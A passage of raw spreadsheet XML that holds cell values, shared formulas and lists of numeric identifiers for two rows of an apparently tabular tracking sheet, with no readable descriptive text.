        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="DC42" s="106">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
      <c r="DD42" s="106">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="DE42" s="106">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
      <c r="DF42" s="106">
        <f t="shared" si="19"/>
        <v>1</v>
      </c>
      <c r="DG42" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH42" s="106">
        <f t="shared" si="21"/>
        <v>1</v>
      </c>
      <c r="DI42" s="106">
        <f t="shared" si="22"/>
        <v>1</v>
      </c>
      <c r="DJ42" s="106">
        <f t="shared" si="23"/>
        <v>0</v>
      </c>
      <c r="DK42" s="107">
        <f t="shared" si="77"/>
        <v>0</v>
      </c>
      <c r="DL42" s="106">
        <f t="shared" si="78"/>
        <v>0</v>
      </c>
      <c r="DM42" s="108" t="s">
        <v>903</v>
      </c>
      <c r="DN42" s="108">
        <v>3.0</v>
      </c>
      <c r="DO42" s="108">
        <v>6.0</v>
      </c>
      <c r="DP42" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ42" s="108" t="s">
        <v>904</v>
      </c>
      <c r="DR42" s="108">
        <v>3.0</v>
      </c>
      <c r="DS42" s="108">
        <v>6.0</v>
      </c>
      <c r="DT42" s="108" t="s">
        <v>905</v>
      </c>
      <c r="DU42" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV42" s="108" t="str">
        <f t="shared" si="91"/>
        <v>44489, 402</v>
      </c>
      <c r="DW42" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX42" s="108" t="s">
        <v>905</v>
      </c>
      <c r="DY42" s="108">
        <v>38319.0</v>
      </c>
      <c r="DZ42" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA42" s="108">
        <v>1.0</v>
      </c>
      <c r="EB42" s="108">
        <v>8.0</v>
      </c>
      <c r="EC42" s="109">
        <v>15.0</v>
      </c>
      <c r="ED42" s="109">
        <v>2.0</v>
      </c>
      <c r="EE42" s="109">
        <v>3.0</v>
      </c>
      <c r="EF42" s="109">
        <v>6.0</v>
      </c>
      <c r="EG42" s="109">
        <v>0.0</v>
      </c>
      <c r="EH42" s="109">
        <v>6.0</v>
      </c>
      <c r="EI42" s="109">
        <v>1.0</v>
      </c>
      <c r="EJ42" s="109">
        <v>0.0</v>
      </c>
      <c r="EK42" s="109">
        <v>1.0</v>
      </c>
      <c r="EL42" s="109">
        <v>1.0</v>
      </c>
      <c r="EM42" s="109">
        <v>2.0</v>
      </c>
      <c r="EN42" s="109">
        <v>3.0</v>
      </c>
      <c r="EO42" s="109">
        <v>6.0</v>
      </c>
      <c r="EP42" s="109">
        <v>0.0</v>
      </c>
      <c r="EQ42" s="109">
        <v>6.0</v>
      </c>
      <c r="ER42" s="110">
        <f t="shared" si="27"/>
        <v>2</v>
      </c>
      <c r="ES42" s="110">
        <f t="shared" si="28"/>
        <v>2</v>
      </c>
      <c r="ET42" s="110">
        <f t="shared" si="29"/>
        <v>1</v>
      </c>
      <c r="EU42" s="110">
        <f t="shared" si="30"/>
        <v>3</v>
      </c>
      <c r="EV42" s="110">
        <f t="shared" si="31"/>
        <v>3</v>
      </c>
      <c r="EW42" s="110">
        <f t="shared" si="32"/>
        <v>1</v>
      </c>
      <c r="EX42" s="110">
        <f t="shared" si="33"/>
        <v>6</v>
      </c>
      <c r="EY42" s="110">
        <f t="shared" si="34"/>
        <v>6</v>
      </c>
      <c r="EZ42" s="110">
        <f t="shared" si="35"/>
        <v>1</v>
      </c>
      <c r="FA42" s="110">
        <f t="shared" si="79"/>
        <v>1</v>
      </c>
      <c r="FB42" s="110">
        <f t="shared" si="80"/>
        <v>1</v>
      </c>
      <c r="FC42" s="111" t="s">
        <v>906</v>
      </c>
      <c r="FD42" s="111">
        <v>8.0</v>
      </c>
      <c r="FE42" s="149">
        <v>17.0</v>
      </c>
      <c r="FF42" s="150" t="s">
        <v>229</v>
      </c>
      <c r="FG42" s="111" t="s">
        <v>907</v>
      </c>
      <c r="FH42" s="111">
        <v>6.0</v>
      </c>
      <c r="FI42" s="111">
        <v>12.0</v>
      </c>
      <c r="FJ42" s="111" t="s">
        <v>908</v>
      </c>
      <c r="FK42" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FL42" s="111" t="str">
        <f t="shared" si="69"/>
        <v>44489, 402, 2002752, 2002749, 2100402, 2044666, 2051116</v>
      </c>
      <c r="FM42" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN42" s="111" t="s">
        <v>908</v>
      </c>
      <c r="FO42" s="111">
        <v>38319.0</v>
      </c>
      <c r="FP42" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ42" s="111">
        <v>1.0</v>
      </c>
      <c r="FR42" s="111">
        <v>8.0</v>
      </c>
      <c r="FS42" s="112">
        <v>14.0</v>
      </c>
      <c r="FT42" s="112">
        <v>9.0</v>
      </c>
      <c r="FU42" s="112">
        <v>10.0</v>
      </c>
      <c r="FV42" s="112">
        <v>6.0</v>
      </c>
      <c r="FW42" s="112">
        <v>11.0</v>
      </c>
      <c r="FX42" s="112">
        <v>17.0</v>
      </c>
      <c r="FY42" s="112">
        <v>1.0</v>
      </c>
      <c r="FZ42" s="112">
        <v>0.0</v>
      </c>
      <c r="GA42" s="112">
        <v>1.0</v>
      </c>
      <c r="GB42" s="112">
        <v>1.0</v>
      </c>
      <c r="GC42" s="112">
        <v>7.0</v>
      </c>
      <c r="GD42" s="112">
        <v>8.0</v>
      </c>
      <c r="GE42" s="112">
        <v>6.0</v>
      </c>
      <c r="GF42" s="112">
        <v>6.0</v>
      </c>
      <c r="GG42" s="112">
        <v>12.0</v>
      </c>
      <c r="GH42" s="113">
        <f t="shared" si="39"/>
        <v>9</v>
      </c>
      <c r="GI42" s="113">
        <f t="shared" si="40"/>
        <v>7</v>
      </c>
      <c r="GJ42" s="113">
        <f t="shared" si="41"/>
        <v>1</v>
      </c>
      <c r="GK42" s="113">
        <f t="shared" si="42"/>
        <v>10</v>
      </c>
      <c r="GL42" s="113">
        <f t="shared" si="43"/>
        <v>8</v>
      </c>
      <c r="GM42" s="113">
        <f t="shared" si="44"/>
        <v>1</v>
      </c>
      <c r="GN42" s="113">
        <f t="shared" si="45"/>
        <v>17</v>
      </c>
      <c r="GO42" s="113">
        <f t="shared" si="46"/>
        <v>12</v>
      </c>
      <c r="GP42" s="113">
        <f t="shared" si="47"/>
        <v>1</v>
      </c>
      <c r="GQ42" s="114">
        <f t="shared" si="81"/>
        <v>1</v>
      </c>
      <c r="GR42" s="113">
        <f t="shared" si="82"/>
        <v>1</v>
      </c>
      <c r="GS42" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT42" s="94" t="s">
        <v>909</v>
      </c>
      <c r="GU42" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GV42" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GW42" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GX42" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY42" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ42" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA42" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB42" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC42" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD42" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HE42" s="117" t="s">
        <v>843</v>
      </c>
      <c r="HF42" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG42" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH42" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI42" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ42" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK42" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL42" s="93">
        <v>8.0</v>
      </c>
      <c r="HM42" s="93">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="HN42" s="93">
        <v>0.0</v>
      </c>
      <c r="HO42" s="93">
        <v>0.0</v>
      </c>
      <c r="HP42" s="93">
        <v>0.0</v>
      </c>
      <c r="HQ42" s="118">
        <f t="shared" si="53"/>
        <v>0</v>
      </c>
      <c r="HR42" s="118">
        <f t="shared" si="54"/>
        <v>0</v>
      </c>
      <c r="HS42" s="118">
        <f t="shared" si="55"/>
        <v>0</v>
      </c>
      <c r="HT42" s="139" t="s">
        <v>12</v>
      </c>
      <c r="HU42" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV42" s="119" t="s">
        <v>910</v>
      </c>
      <c r="HW42" s="119">
        <v>3.0</v>
      </c>
      <c r="HX42" s="119">
        <v>6.0</v>
      </c>
      <c r="HY42" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ42" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA42" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB42" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC42" s="120" t="s">
        <v>425</v>
      </c>
      <c r="ID42" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IE42" s="120">
        <v>9999.0</v>
      </c>
      <c r="IF42" s="120" t="s">
        <v>910</v>
      </c>
      <c r="IG42" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH42" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II42" s="99" t="s">
        <v>911</v>
      </c>
      <c r="IJ42" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK42" s="99">
        <v>8.0</v>
      </c>
      <c r="IL42" s="99">
        <v>0.0</v>
      </c>
      <c r="IM42" s="121">
        <f t="shared" ref="IM42:IM52" si="93">IL42+IN42</f>
        <v>0</v>
      </c>
      <c r="IN42" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO42" s="98">
        <v>0.0</v>
      </c>
      <c r="IP42" s="123">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="IQ42" s="118">
        <f t="shared" si="59"/>
        <v>0</v>
      </c>
      <c r="IR42" s="118">
        <f t="shared" si="60"/>
        <v>0</v>
      </c>
      <c r="IS42" s="124" t="s">
        <v>13</v>
      </c>
      <c r="IT42" s="127"/>
      <c r="IU42" s="127"/>
      <c r="IV42" s="127"/>
      <c r="IW42" s="127"/>
      <c r="IX42" s="127"/>
      <c r="IY42" s="127"/>
      <c r="IZ42" s="127"/>
      <c r="JA42" s="127"/>
      <c r="JB42" s="127"/>
      <c r="JC42" s="127"/>
      <c r="JD42" s="127"/>
      <c r="JE42" s="127"/>
      <c r="JF42" s="127"/>
      <c r="JG42" s="127"/>
      <c r="JH42" s="127"/>
      <c r="JI42" s="127"/>
      <c r="JJ42" s="127"/>
      <c r="JK42" s="127"/>
      <c r="JL42" s="127"/>
      <c r="JM42" s="127"/>
      <c r="JN42" s="127"/>
      <c r="JO42" s="127"/>
      <c r="JP42" s="127"/>
      <c r="JQ42" s="127"/>
      <c r="JR42" s="127"/>
      <c r="JS42" s="127"/>
      <c r="JT42" s="127"/>
      <c r="JU42" s="127"/>
      <c r="JV42" s="127"/>
      <c r="JW42" s="127"/>
      <c r="JX42" s="127"/>
      <c r="JY42" s="127"/>
      <c r="JZ42" s="127"/>
      <c r="KA42" s="127"/>
      <c r="KB42" s="127"/>
      <c r="KC42" s="127"/>
      <c r="KD42" s="127"/>
      <c r="KE42" s="127"/>
      <c r="KF42" s="127"/>
      <c r="KG42" s="127"/>
      <c r="KH42" s="127"/>
      <c r="KI42" s="127"/>
      <c r="KJ42" s="127"/>
      <c r="KK42" s="127"/>
      <c r="KL42" s="127"/>
      <c r="KM42" s="127"/>
      <c r="KN42" s="127"/>
      <c r="KO42" s="127"/>
      <c r="KP42" s="127"/>
      <c r="KQ42" s="127"/>
      <c r="KR42" s="127"/>
      <c r="KS42" s="127"/>
      <c r="KT42" s="127"/>
      <c r="KU42" s="127"/>
      <c r="KV42" s="127"/>
      <c r="KW42" s="127"/>
      <c r="KX42" s="127"/>
      <c r="KY42" s="127"/>
      <c r="KZ42" s="127"/>
      <c r="LA42" s="127"/>
      <c r="LB42" s="127"/>
      <c r="LC42" s="127"/>
      <c r="LD42" s="127"/>
      <c r="LE42" s="127"/>
      <c r="LF42" s="127"/>
      <c r="LG42" s="127"/>
      <c r="LH42" s="127"/>
      <c r="LI42" s="127"/>
      <c r="LJ42" s="127"/>
      <c r="LK42" s="127"/>
      <c r="LL42" s="127"/>
      <c r="LM42" s="127"/>
      <c r="LN42" s="127"/>
      <c r="LO42" s="127"/>
      <c r="LP42" s="127"/>
      <c r="LQ42" s="127"/>
      <c r="LR42" s="127"/>
      <c r="LS42" s="127"/>
      <c r="LT42" s="127"/>
      <c r="LU42" s="127"/>
      <c r="LV42" s="127"/>
      <c r="LW42" s="127"/>
      <c r="LX42" s="127"/>
      <c r="LY42" s="127"/>
      <c r="LZ42" s="127"/>
      <c r="MA42" s="127"/>
      <c r="MB42" s="127"/>
      <c r="MC42" s="127"/>
      <c r="MD42" s="127"/>
      <c r="ME42" s="127"/>
      <c r="MF42" s="127"/>
      <c r="MG42" s="127"/>
      <c r="MH42" s="127"/>
      <c r="MI42" s="127"/>
      <c r="MJ42" s="127"/>
      <c r="MK42" s="127"/>
      <c r="ML42" s="127"/>
      <c r="MM42" s="127"/>
      <c r="MN42" s="127"/>
      <c r="MO42" s="127"/>
      <c r="MP42" s="127"/>
      <c r="MQ42" s="127"/>
      <c r="MR42" s="127"/>
      <c r="MS42" s="127"/>
      <c r="MT42" s="127"/>
      <c r="MU42" s="127"/>
      <c r="MV42" s="127"/>
      <c r="MW42" s="127"/>
      <c r="MX42" s="127"/>
      <c r="MY42" s="127"/>
      <c r="MZ42" s="127"/>
      <c r="NA42" s="127"/>
      <c r="NB42" s="127"/>
      <c r="NC42" s="127"/>
      <c r="ND42" s="127"/>
      <c r="NE42" s="127"/>
      <c r="NF42" s="127"/>
      <c r="NG42" s="127"/>
      <c r="NH42" s="127"/>
      <c r="NI42" s="127"/>
      <c r="NJ42" s="127"/>
      <c r="NK42" s="127"/>
      <c r="NL42" s="127"/>
      <c r="NM42" s="127"/>
      <c r="NN42" s="127"/>
      <c r="NO42" s="127"/>
      <c r="NP42" s="127"/>
      <c r="NQ42" s="127"/>
      <c r="NR42" s="127"/>
      <c r="NS42" s="127"/>
      <c r="NT42" s="127"/>
      <c r="NU42" s="127"/>
      <c r="NV42" s="127"/>
      <c r="NW42" s="127"/>
      <c r="NX42" s="127"/>
      <c r="NY42" s="127"/>
    </row>
    <row r="43" ht="153.75" customHeight="1">
      <c r="B43" s="89" t="s">
        <v>427</v>
      </c>
      <c r="C43" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D43" s="90" t="s">
        <v>428</v>
      </c>
      <c r="E43" s="90" t="s">
        <v>912</v>
      </c>
      <c r="F43" s="90" t="s">
        <v>913</v>
      </c>
      <c r="G43" s="90" t="s">
        <v>914</v>
      </c>
      <c r="H43" s="90" t="s">
        <v>915</v>
      </c>
      <c r="I43" s="92" t="s">
        <v>916</v>
      </c>
      <c r="J43" s="92" t="s">
        <v>917</v>
      </c>
      <c r="K43" s="92" t="s">
        <v>918</v>
      </c>
      <c r="L43" s="93" t="s">
        <v>375</v>
      </c>
      <c r="M43" s="93">
        <v>10.0</v>
      </c>
      <c r="N43" s="93">
        <v>3.0</v>
      </c>
      <c r="O43" s="93">
        <v>0.0</v>
      </c>
      <c r="P43" s="93">
        <v>3.0</v>
      </c>
      <c r="Q43" s="93">
        <f t="shared" si="92"/>
        <v>3</v>
      </c>
      <c r="R43" s="93">
        <v>3.0</v>
      </c>
      <c r="S43" s="93">
        <v>0.0</v>
      </c>
      <c r="T43" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U43" s="98" t="s">
        <v>224</v>
      </c>
      <c r="V43" s="126" t="s">
        <v>919</v>
      </c>
      <c r="W43" s="96" t="s">
        <v>12</v>
      </c>
      <c r="X43" s="97" t="s">
        <v>920</v>
      </c>
      <c r="Y43" s="96" t="s">
        <v>921</v>
      </c>
      <c r="Z43" s="96" t="s">
        <v>922</v>
      </c>
      <c r="AA43" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB43" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC43" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD43" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE43" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF43" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG43" s="98" t="s">
        <v>306</v>
      </c>
      <c r="AH43" s="99" t="s">
        <v>923</v>
      </c>
      <c r="AI43" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ43" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AK43" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AL43" s="100">
        <v>0.0</v>
      </c>
      <c r="AM43" s="100">
        <v>0.0</v>
      </c>
      <c r="AN43" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO43" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AP43" s="100">
        <v>0.0</v>
      </c>
      <c r="AQ43" s="100">
        <v>0.0</v>
      </c>
      <c r="AR43" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AS43" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT43" s="100" t="str">
        <f t="shared" si="89"/>
        <v>-</v>
      </c>
      <c r="AU43" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV43" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AW43" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX43" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY43" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ43" s="100">
        <v>0.0</v>
      </c>
      <c r="BA43" s="102">
        <v>10.0</v>
      </c>
      <c r="BB43" s="102">
        <v>0.0</v>
      </c>
      <c r="BC43" s="102">
        <v>0.0</v>
      </c>
      <c r="BD43" s="102">
        <v>0.0</v>
      </c>
      <c r="BE43" s="102">
        <v>0.0</v>
      </c>
      <c r="BF43" s="102">
        <v>0.0</v>
      </c>
      <c r="BG43" s="102">
        <v>0.0</v>
      </c>
      <c r="BH43" s="102">
        <v>0.0</v>
      </c>
      <c r="BI43" s="102">
        <v>0.0</v>
      </c>
      <c r="BJ43" s="102">
        <v>0.0</v>
      </c>
      <c r="BK43" s="102">
        <v>0.0</v>
      </c>
      <c r="BL43" s="103">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BM43" s="103">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="BN43" s="103">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BO43" s="103">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="BP43" s="103">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="BQ43" s="103">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="BR43" s="103">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="BS43" s="103">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="BT43" s="103">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="BU43" s="103">
        <f t="shared" si="75"/>
        <v>0</v>
      </c>
      <c r="BV43" s="103">
        <f t="shared" si="76"/>
        <v>0</v>
      </c>
      <c r="BW43" s="104">
        <v>2026850.0</v>
      </c>
      <c r="BX43" s="104">
        <v>1.0</v>
      </c>
      <c r="BY43" s="104">
        <v>19.0</v>
      </c>
      <c r="BZ43" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA43" s="104">
        <v>2026850.0</v>
      </c>
      <c r="CB43" s="104">
        <v>1.0</v>
      </c>
      <c r="CC43" s="104">
        <v>19.0</v>
      </c>
      <c r="CD43" s="104">
        <v>2026850.0</v>
      </c>
      <c r="CE43" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF43" s="104">
        <f t="shared" si="90"/>
        <v>2026850</v>
      </c>
      <c r="CG43" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH43" s="104">
        <v>2026850.0</v>
      </c>
      <c r="CI43" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CJ43" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK43" s="104">
        <v>0.0</v>
      </c>
      <c r="CL43" s="104">
        <v>0.0</v>
      </c>
      <c r="CM43" s="105">
        <v>10.0</v>
      </c>
      <c r="CN43" s="105">
        <v>4.0</v>
      </c>
      <c r="CO43" s="105">
        <v>19.0</v>
      </c>
      <c r="CP43" s="105">
        <v>0.0</v>
      </c>
      <c r="CQ43" s="105">
        <v>19.0</v>
      </c>
      <c r="CR43" s="105">
        <v>19.0</v>
      </c>
      <c r="CS43" s="105">
        <v>0.0</v>
      </c>
      <c r="CT43" s="105">
        <v>0.0</v>
      </c>
      <c r="CU43" s="105">
        <v>0.0</v>
      </c>
      <c r="CV43" s="105">
        <v>0.0</v>
      </c>
      <c r="CW43" s="105">
        <v>4.0</v>
      </c>
      <c r="CX43" s="105">
        <v>19.0</v>
      </c>
      <c r="CY43" s="105">
        <v>0.0</v>
      </c>
      <c r="CZ43" s="105">
        <v>19.0</v>
      </c>
      <c r="DA43" s="105">
        <v>19.0</v>
      </c>
      <c r="DB43" s="106">
        <f t="shared" si="15"/>
        <v>1.333333333</v>
      </c>
      <c r="DC43" s="106">
        <f t="shared" si="16"/>
        <v>1.333333333</v>
      </c>
      <c r="DD43" s="106">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="DE43" s="106">
        <f t="shared" si="18"/>
        <v>6.333333333</v>
      </c>
      <c r="DF43" s="106">
        <f t="shared" si="19"/>
        <v>6.333333333</v>
      </c>
      <c r="DG43" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH43" s="106">
        <f t="shared" si="21"/>
        <v>6.333333333</v>
      </c>
      <c r="DI43" s="106">
        <f t="shared" si="22"/>
        <v>6.333333333</v>
      </c>
      <c r="DJ43" s="106">
        <f t="shared" si="23"/>
        <v>0</v>
      </c>
      <c r="DK43" s="107">
        <f t="shared" si="77"/>
        <v>0</v>
      </c>
      <c r="DL43" s="106">
        <f t="shared" si="78"/>
        <v>0</v>
      </c>
      <c r="DM43" s="108" t="s">
        <v>924</v>
      </c>
      <c r="DN43" s="108">
        <v>4.0</v>
      </c>
      <c r="DO43" s="108">
        <v>24.0</v>
      </c>
      <c r="DP43" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ43" s="108" t="s">
        <v>924</v>
      </c>
      <c r="DR43" s="108">
        <v>4.0</v>
      </c>
      <c r="DS43" s="108">
        <v>24.0</v>
      </c>
      <c r="DT43" s="108" t="s">
        <v>924</v>
      </c>
      <c r="DU43" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV43" s="108" t="str">
        <f t="shared" si="91"/>
        <v>44604, 44489, 15935, 202685</v>
      </c>
      <c r="DW43" s="108">
        <v>44604.0</v>
      </c>
      <c r="DX43" s="108" t="s">
        <v>925</v>
      </c>
      <c r="DY43" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DZ43" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA43" s="108">
        <v>0.0</v>
      </c>
      <c r="EB43" s="108">
        <v>0.0</v>
      </c>
      <c r="EC43" s="109">
        <v>10.0</v>
      </c>
      <c r="ED43" s="109">
        <v>9.0</v>
      </c>
      <c r="EE43" s="109">
        <v>24.0</v>
      </c>
      <c r="EF43" s="109">
        <v>5.0</v>
      </c>
      <c r="EG43" s="109">
        <v>19.0</v>
      </c>
      <c r="EH43" s="109">
        <v>24.0</v>
      </c>
      <c r="EI43" s="109">
        <v>0.0</v>
      </c>
      <c r="EJ43" s="109">
        <v>0.0</v>
      </c>
      <c r="EK43" s="109">
        <v>0.0</v>
      </c>
      <c r="EL43" s="109">
        <v>0.0</v>
      </c>
      <c r="EM43" s="109">
        <v>9.0</v>
      </c>
      <c r="EN43" s="109">
        <v>24.0</v>
      </c>
      <c r="EO43" s="109">
        <v>5.0</v>
      </c>
      <c r="EP43" s="109">
        <v>19.0</v>
      </c>
      <c r="EQ43" s="109">
        <v>24.0</v>
      </c>
      <c r="ER43" s="110">
        <f t="shared" si="27"/>
        <v>3</v>
      </c>
      <c r="ES43" s="110">
        <f t="shared" si="28"/>
        <v>3</v>
      </c>
      <c r="ET43" s="110">
        <f t="shared" si="29"/>
        <v>0</v>
      </c>
      <c r="EU43" s="110">
        <f t="shared" si="30"/>
        <v>8</v>
      </c>
      <c r="EV43" s="110">
        <f t="shared" si="31"/>
        <v>8</v>
      </c>
      <c r="EW43" s="110">
        <f t="shared" si="32"/>
        <v>0</v>
      </c>
      <c r="EX43" s="110">
        <f t="shared" si="33"/>
        <v>8</v>
      </c>
      <c r="EY43" s="110">
        <f t="shared" si="34"/>
        <v>8</v>
      </c>
      <c r="EZ43" s="110">
        <f t="shared" si="35"/>
        <v>0</v>
      </c>
      <c r="FA43" s="110">
        <f t="shared" si="79"/>
        <v>0</v>
      </c>
      <c r="FB43" s="110">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="FC43" s="111" t="s">
        <v>926</v>
      </c>
      <c r="FD43" s="111">
        <v>9.0</v>
      </c>
      <c r="FE43" s="111">
        <v>34.0</v>
      </c>
      <c r="FF43" s="101" t="s">
        <v>229</v>
      </c>
      <c r="FG43" s="111" t="s">
        <v>927</v>
      </c>
      <c r="FH43" s="111">
        <v>7.0</v>
      </c>
      <c r="FI43" s="111">
        <v>28.0</v>
      </c>
      <c r="FJ43" s="111" t="s">
        <v>926</v>
      </c>
      <c r="FK43" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FL43" s="111" t="str">
        <f t="shared" si="69"/>
        <v>44604, 44489, 15935, 2002752, 2002749, 2044666, 2026850, 2036224, 2009345</v>
      </c>
      <c r="FM43" s="111">
        <v>44604.0</v>
      </c>
      <c r="FN43" s="111" t="s">
        <v>928</v>
      </c>
      <c r="FO43" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FP43" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ43" s="111">
        <v>0.0</v>
      </c>
      <c r="FR43" s="111">
        <v>0.0</v>
      </c>
      <c r="FS43" s="112">
        <v>10.0</v>
      </c>
      <c r="FT43" s="112">
        <v>9.0</v>
      </c>
      <c r="FU43" s="112">
        <v>30.0</v>
      </c>
      <c r="FV43" s="112">
        <v>5.0</v>
      </c>
      <c r="FW43" s="112">
        <v>29.0</v>
      </c>
      <c r="FX43" s="112">
        <v>30.0</v>
      </c>
      <c r="FY43" s="112">
        <v>0.0</v>
      </c>
      <c r="FZ43" s="112">
        <v>0.0</v>
      </c>
      <c r="GA43" s="112">
        <v>0.0</v>
      </c>
      <c r="GB43" s="112">
        <v>0.0</v>
      </c>
      <c r="GC43" s="112">
        <v>9.0</v>
      </c>
      <c r="GD43" s="112">
        <v>27.0</v>
      </c>
      <c r="GE43" s="112">
        <v>5.0</v>
      </c>
      <c r="GF43" s="112">
        <v>23.0</v>
      </c>
      <c r="GG43" s="112">
        <v>27.0</v>
      </c>
      <c r="GH43" s="113">
        <f t="shared" si="39"/>
        <v>3</v>
      </c>
      <c r="GI43" s="113">
        <f t="shared" si="40"/>
        <v>3</v>
      </c>
      <c r="GJ43" s="113">
        <f t="shared" si="41"/>
        <v>0</v>
      </c>
      <c r="GK43" s="113">
        <f t="shared" si="42"/>
        <v>10</v>
      </c>
      <c r="GL43" s="113">
        <f t="shared" si="43"/>
        <v>9</v>
      </c>
      <c r="GM43" s="113">
        <f t="shared" si="44"/>
        <v>0</v>
      </c>
      <c r="GN43" s="113">
        <f t="shared" si="45"/>
        <v>10</v>
      </c>
      <c r="GO43" s="113">
        <f t="shared" si="46"/>
        <v>9</v>
      </c>
      <c r="GP43" s="113">
        <f t="shared" si="47"/>
        <v>0</v>
      </c>
      <c r="GQ43" s="114">
        <f t="shared" si="81"/>
        <v>0</v>
      </c>
      <c r="GR43" s="113">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
      <c r="GS43" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT43" s="94"/>
      <c r="GU43" s="116">
        <v>48934.0</v>
      </c>
      <c r="GV43" s="116">
        <v>1.0</v>
      </c>
      <c r="GW43" s="116">
        <v>4.0</v>
      </c>
      <c r="GX43" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY43" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ43" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA43" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB43" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC43" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD43" s="131">
        <v>49834.0</v>
      </c>
      <c r="HE43" s="131">
        <v>49834.0</v>
      </c>
      <c r="HF43" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG43" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH43" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI43" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ43" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK43" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL43" s="93">
        <v>9.0</v>
      </c>
      <c r="HM43" s="93">
        <f t="shared" si="83"/>
        <v>3</v>
      </c>
      <c r="HN43" s="93">
        <v>3.0</v>
      </c>
      <c r="HO43" s="93">
        <v>0.0</v>
